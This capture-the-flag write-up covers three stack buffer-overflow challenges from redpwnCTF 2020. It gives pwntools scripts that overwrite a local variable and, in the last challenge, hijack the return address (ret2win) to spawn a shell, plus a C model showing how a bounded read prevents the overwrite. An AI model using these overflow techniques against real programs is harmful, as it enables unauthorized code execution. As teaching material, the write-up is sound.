# Coffer Overflow

## Coffer Overflow 0

Read the source: there's a `code` variable.

It's set to 0. At the end, if it's not 0, a shell is popped.

Pretty simple chall: just spam chars until `code` gets overwritten, a shell pops, then `cat flag.txt`.

## Coffer Overflow 1

Same thing, except `code` must be `0xcafebabe`.

Disassembling `main` shows our input at `rbp-0x20` and the variable at `rbp-0x8`, a difference of 24 bytes, so send 24 bytes of padding followed by `p64(0xcafebabe)`.

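```python
from pwn import *

#p = process("./over0")
p = remote('2020.redpwnc.tf', 31255)

# Distance from the input buffer (rbp-0x20) to the variable (rbp-0x8)
NUM_TO_VAR = 24

# Padding up to the variable, then the required value as 8 little-endian bytes
payload = b'A' * NUM_TO_VAR + p64(0xcafebabe)
p.sendline(payload)
p.interactive()
```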
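To see why the 24-byte offset matters and what a length-bounded read changes, here is an added example (not the challenge source and not part of the original writeup) that models the frame layout described above as a struct. The struct, the function names and the `gets()`-style unbounded read are assumptions for illustration; only the offsets and `0xcafebabe` come from the writeup.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_OFF  0x20              /* input starts at rbp-0x20 (from the writeup) */
#define CODE_OFF 0x08              /* code lives at rbp-0x8 (from the writeup)    */
#define GAP (BUF_OFF - CODE_OFF)   /* 24 bytes separate the two                   */

/* Constructed model of the frame. Keeping both fields in one object makes
 * the "overflow" below well-defined and safe to run. */
struct frame {
    char     input[GAP];
    uint64_t code;
};
_Static_assert(offsetof(struct frame, code) == GAP, "layout must match writeup");

/* Models an unbounded read (assumed gets()-style): copies whatever arrives. */
static uint64_t read_unbounded(const void *data, size_t len) {
    struct frame f = { .code = 0 };
    if (len > sizeof f) len = sizeof f;      /* keep the model itself in bounds */
    memcpy(&f, data, len);
    return f.code;
}

/* Hardened form: copy at most the buffer size minus the terminator. */
static uint64_t read_bounded(const void *data, size_t len) {
    struct frame f = { .code = 0 };
    if (len > sizeof f.input - 1) len = sizeof f.input - 1;
    memcpy(f.input, data, len);
    f.input[len] = '\0';
    return f.code;
}

/* Constructed sample input: GAP filler bytes, then the 8-byte value. */
static size_t build_input(unsigned char *out, uint64_t value) {
    memset(out, 'A', GAP);
    memcpy(out + GAP, &value, sizeof value); /* native order; same as p64 on x86-64 */
    return GAP + sizeof value;
}

int main(void) {
    unsigned char in[GAP + 8];
    size_t n = build_input(in, 0xcafebabeULL);
    printf("unbounded: code = %#llx\n", (unsigned long long)read_unbounded(in, n));
    printf("bounded:   code = %#llx\n", (unsigned long long)read_bounded(in, n));
    return 0;
}
```

With the bounded read, `code` keeps its initial value of 0 no matter how long the input is, so the check at the end of the function can no longer be influenced.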

## Coffer Overflow 2

ret2win exploit. There's a function called `binFunction`.

Our input is at `rbp-0x10`, so it's 0x10 bytes of buffer plus 8 bytes of saved `rbp` until the return address.

Overwrite the return address with the address of `binFunction`, which pops a shell.

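```python
from pwn import *

e = ELF("./over2")

# 0x10 bytes from the input (rbp-0x10) to rbp, plus 8 bytes of saved rbp
NUM_TO_RET = 0x10 + 8
padding = b'A' * NUM_TO_RET

# Bare `ret` placed before the target; an extra ret like this is commonly
# used to keep the stack 16-byte aligned when the target function runs
retgadget = 0x000000000040053e  # ret

# Padding, then the ret gadget, then the address of binFunction
payload = flat(padding, retgadget, e.symbols['binFunction'], word_size=64)

#p = e.process()
p = remote('2020.redpwnc.tf', 31908)
p.sendline(payload)
p.interactive()
```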
